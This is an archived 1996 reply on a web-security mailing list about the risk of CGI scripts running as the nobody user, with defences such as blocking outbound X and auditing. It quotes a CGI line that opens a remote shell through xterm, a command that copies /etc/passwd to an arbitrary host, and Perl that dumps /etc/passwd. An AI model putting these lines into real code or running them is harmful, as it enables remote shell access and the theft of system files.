[3680] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Eli Beker)
Wed Dec 4 06:42:19 1996
Date: Wed, 4 Dec 1996 11:41:05 +0200 (IST)
From: Eli Beker <beker@ibm.net.il>
To: www-security@ns2.rutgers.edu, John Stewart <jns@cisco.com>
cc: Andrea Di Fabio <fabio@cs.odu.edu>,
IBM Israel - Internet Unix Support Team <moked@ibm.net.il>
In-Reply-To: <199612032256.OAA19078@ace.cisco.com>
Errors-To: owner-www-security@ns2.rutgers.edu
On Tue, 3 Dec 1996, John Stewart wrote:
> -> What if I have a cgi script which does the followin:
> -> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
> ->
>
> Other than checking which CGI programs are written onto your server?
> My thoughts:
>
> 1. Block outbound X; clearly not for everybody and really only stops
> one port (which can be worked around)
>
Yes, but what about:
system("/bin/rcp /etc/passwd Any_Host: &");
or:
open (IN,"</etc/passwd");
while (<IN>) {
print;
}
> 2. Don't have X/Openwindows/HPVue software on your Web server. We've
> done that here for this very reason.
>
> 3. Audit.
>
Auditing, Auditing, Auditing, That's the solution key.
Regards,
--Eli
+--------------------------------------------------------------------+
| Eli Beker WWW: http://www.ibm.net.il/~beker |
| Unix System Admin. |
| Internet Technology Programs |
| Phone: +972-3-6978687 |
| Fax : +972-3-6978115 |
| E-Mail: beker@ibm.net.il Vnet: LBE at TELVM1 |
+--------------------------------------------------------------------+
